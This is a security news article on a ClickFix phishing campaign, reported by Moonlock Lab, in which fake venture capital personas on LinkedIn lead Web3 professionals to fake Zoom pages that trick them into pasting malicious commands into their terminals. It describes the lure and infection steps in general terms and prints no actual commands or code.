ClickFix Alert: Fake Venture Capitalists Target Web3 Pros with “Terminal” Phishing

Cybersecurity researchers at Moonlock Lab have unmasked a coordinated malware operation targeting cryptocurrency and Web3 professionals. The campaign, which shares striking tactical overlaps with the North Korean-aligned threat group UNC1069, uses fabricated venture capital identities and fraudulent video conferencing links to deliver cross-platform payloads.

The attack begins on LinkedIn, where operators use polished personas like “Mykhailo Hureiev,” a supposed Co-Founder at the fictitious SolidBit Capital. The approach is highly personalized, often beginning with flattery regarding a target’s visibility in the crypto community.

Once a rapport is established, the operator pushes for a meeting via a Calendly link. However, this link is a trap: it is “configured to redirect the victim to a fake Zoom meeting link” that serves as the gateway for the infection.

What makes this campaign particularly dangerous is its use of the ClickFix technique. Unlike traditional downloads that might be flagged by antivirus software, ClickFix “weaponizes user trust by disguising malicious command execution as a routine browser verification step”.

1. Fake CAPTCHA: Victims are presented with a familiar-looking “I’m not a robot” checkbox with Cloudflare branding.
2. Clipboard Poisoning: Clicking the box silently “writes a malicious command to the user’s clipboard” using JavaScript.
3. Guided Execution: The page then displays a modal that “instructs the user to open their terminal and paste the clipboard contents”.

The Moonlock report emphasizes the psychological trickery involved, noting that the attackers use “animated step-by-step cursor demonstrations” and “a countdown timer to create artificial urgency”.

The campaign is “cross-platform by design,” detecting the victim’s operating system to serve the appropriate malicious script:

• Windows: The clipboard receives a PowerShell command that initiates a “classic fileless malware loader,” executing a remote script directly in memory to avoid leaving artifacts on the disk.
• macOS: The payload is even more elaborate, using a “bash one-liner” that can even install Homebrew to facilitate the download of the final Python-based malware

The threat actors are highly organized, building out “fully built-out corporate facades designed to stand up to the scrutiny of a victim’s due diligence check”. Moonlock Lab found that while SolidBit Capital is their current front, they are already preparing Lumax Capital as their next iteration, complete with AI-generated headshots of “team members” with fabricated Stanford credentials.

Researchers warn that “behavioral and operational indicators are consistent with tactics previously attributed to DPRK-aligned threat actors,” though definitive attribution remains open.